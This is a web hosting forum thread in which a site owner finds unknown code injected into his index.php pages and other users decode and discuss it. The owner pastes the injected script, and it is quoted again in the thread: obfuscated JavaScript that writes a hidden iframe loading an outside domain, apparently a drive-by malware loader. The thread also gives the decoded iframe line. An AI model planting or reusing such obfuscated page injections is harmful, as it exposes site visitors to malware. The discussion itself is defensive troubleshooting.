I don't know what is going on with my web site, but i want to understand! I had first hosted this site that is on my frih account. http://pariafric.frih.net But I am encountering many problem with it. The sripts are in PHP5 with oriented object. I don't think the language is about something in it. But i just want to understand why each time, there are some lines that are inserted into my index.php pages of all my folder. Sripts that i have not written at all!!!
Can somebody explain me that? then your scripts have a bug in them which is being exploited, or a user has access to your account.
| rvec wrote: |
| then your scripts have a bug in them which is being exploited, or a user has access to your account. |
Which user? that can write suche things
<script language="JavaScript">function ualfdkh){return String.fromCharCode(fdkh);}var pfmv="060105102114097109101032115114099061039104116116112058047047107108101112097046099110047111108097046104116109108039032119105100116104061039050054048039032104101105103104116061039049049048039032115116121108101061039100105115112108097121058032110111110101059039062060047105102114097109101062";var gjxy="";for(zatk=0;zatk<pfmv.length;zatk+=3){gjxy+=ualpfmv.substr (zatk, 3));}document.write(gjxy);</script>First, try changing your password. Someone could have figured out your account password.
A script you have host might have had a hole in it that let someone hack it. Have you installed any scripts from other sources, or used scripts that deal with files?
(Edited a bit to be readable and not stretch page, but still accurate to original)
| pollux1er wrote: |
<script language="JavaScript">function ualfdkh)
{return String.fromCharCode(fdkh);}
var pfmv="06010510211409710910103211511409906103910411611611\
20580470471071081011120970460991100471111080970461041161\
09108039032119105100116104061039050054048039032104101105\
10310411606103904904904803903211511612110810106103910010\
51151121080971210580321101111101010590390620600471051021\
14097109101062";
var gjxy="";
for(zatk=0;zatk<pfmv.length;zatk+=3)
{gjxy+=ualpfmv.substr (zatk, 3));}
document.write(gjxy);</script> |
That was added to one of your pages? That looks like it would... print some sort of text to the page obfuscated in the numbers.
Checking...
First off, that script has a misspelling - change all occurrences of "ual" to "ua(" to get it to work. (Not that I'd think you'd want to in your real pages, but just to test the script.)
After doing that, the script will attempt to add the following html to the page:
| Quote: |
| <iframe src="http://klepa.cn/ola.html" style="display: none;" height="110" width="260"></iframe> |
Which doesn't make sense, as
- The page linked to gives just a 502 error, making it worthless.
- The display-style is set to none, so it doesn't even show up on the page, even though the author bothered to set the height and width of the iframe. (Maybe some browsers need those set for compatibility? Still stupid.)
My only thought is that the website linked to could be secretly tracking your website usage, but that's kinda odd for some hacker to do if he's gotten into your pages. Or maybe the page linked to used to be different, and automatically prompted the user to download malware. Thanks to help me solving this problem. I have already change my password. I am waiting to see if it is going to happen again.
If it does, you've got a bug in your code somewhere that allows people browsing your page to upload files or modify your page in some way. In this case:
- Cast a critical eye over any javascript your page uses intentionally. If you're not sure about whether a certain system is causing vulnerabilities or not, Google is your friend.
- If you've got things that allow users to add content to your page, such as forums or chat boxes, look out for possible SQL or javascript injections.
Thanks for this advice. I will.
| Fire Boar wrote: |
If it does, you've got a bug in your code somewhere that allows people browsing your page to upload files or modify your page in some way. In this case:
- Cast a critical eye over any javascript your page uses intentionally. If you're not sure about whether a certain system is causing vulnerabilities or not, Google is your friend.
- If you've got things that allow users to add content to your page, such as forums or chat boxes, look out for possible SQL or javascript injections. |
Javascript can't do something like that. The second one could be the problem though.The notice I can may since I have changed my password is that nothing new happen again.
What Agent ME said... but...
http://klepa.cn/
Correct me if I'm wrong but doesn't that look like a frihost placeholder page? | DjMilez wrote: |
What Agent ME said... but...
http://klepa.cn/
Correct me if I'm wrong but doesn't that look like a frihost placeholder page? |
I don't really understand your question... | Quote: |
| Correct me if I'm wrong but doesn't that look like a frihost placeholder page? |
That is the main index.html page for when you create a hosting account with Directadmin, not Frihost.One thing i know from now is that i have been hacked. Dont ask me why!
and that post was worth bumping a 3 month old topic?
-closed-
